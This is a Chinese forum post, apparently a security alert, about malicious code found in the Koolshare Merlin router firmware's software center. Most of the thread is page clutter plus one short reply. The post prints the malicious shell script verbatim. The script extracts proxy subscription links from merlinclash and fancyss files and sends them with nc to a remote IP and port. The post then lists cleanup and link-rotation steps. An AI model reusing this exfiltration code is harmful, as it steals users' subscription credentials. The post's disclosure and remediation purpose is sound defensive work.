每日签到
奶昔超市
点数市场
奶昔访达
添加到桌面
收藏本站
切换到宽版
板块
NaixiBBS
扩展
Fun
登录
注册
奶昔论坛
»
板块
›
内容区
›
技术
›
Koolshare梅林固件存在恶意代码偷机场订阅 ...
返回列表
发布新帖
查看:
1757
|
回复:
1
[安全]
Koolshare梅林固件存在恶意代码偷机场订阅
heardic
heardic
当前离线
积分
4695
雷达卡
发表于 2024-12-8 00:32:36
来自手机
|
查看全部
|
阅读模式
欢迎注册论坛,享受更多奶昔会员权益!
您需要
登录
才可以下载或查看,没有账号?
注册
×
紧急通知!紧急通知!
最近不断有软件中心页面错误,版本变成0.0.0的事件发生,且ssh无法登录,scp也无法使用!
经过排查,这是因为恶意代码被插入了软件中心的环境变量脚本导致的!
恶意代码如下:
############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)
if [ ! -z "$links" ]; then
echo "$links" | nc -w 5 45.61.185.105 6232
fi
else
echo_date ""
fi
# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
online_links=$(grep 'ss_online_links' /jffs/ksdb/log)
if [ ! -z "$online_links" ]; then
echo "$online_links" | nc -w 5 45.61.185.105 6232
fi
fi
复制代码
以上恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!
简单来说,这些代码的作用就是偷订阅链接!!
目前还不知道恶意代码是怎么插入的,我们还在调查!
如果大家遇到这个问题,你的订阅链接大概率已经被泄露!
赶紧采取以下措施:
如果使用了usb2jffs插件:
1. 拔掉U盘,格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心,将其升级到最新版本(目前是1.9.34)
4. 插入U盘重新制作usb2jffs
5. 最重要的:去你的机场更换订阅链接!
如果没用usb2jffs插件,执行2,3,5步骤!即可
来源:
https://t.me/ks_merlin/526
代码
,
恶意
,
订阅
,
链接
,
软件
评分
参与人数
1
经验
+3
收起
理由
c919
+ 3
淡定
查看全部评分
爱生活,爱奶昔~
回复
使用道具
举报
照妖镜
摆烂咕咕
摆烂咕咕
当前离线
积分
4593
雷达卡
发表于 2024-12-8 11:22:50
|
查看全部
这不是istoreos以前的那个项目嘛,还有人用啊
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
照妖镜
返回列表
发布新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
浏览过的版块
极圈
云计算
相关网站
9eSIM
eSTKme
Xesim
eSIM.GG
RedteaGO
站内服务
RSS
Sitemap
CDK
SSO
更多...
认证与推广
用户认证制度
User Verification System
认证企业/机构展示
广告招商
联系支持
卡粉专属群
官方电报群
© 2025
Nyarime
沪ICP备13020230号-1
|
沪公网安备 31010702007642号
手机版
小黑屋
RSS
返回顶部
关灯
在本版发帖
快速回复
返回顶部
返回列表
雷达卡
发表于 2024-12-8 00:32:36
照妖镜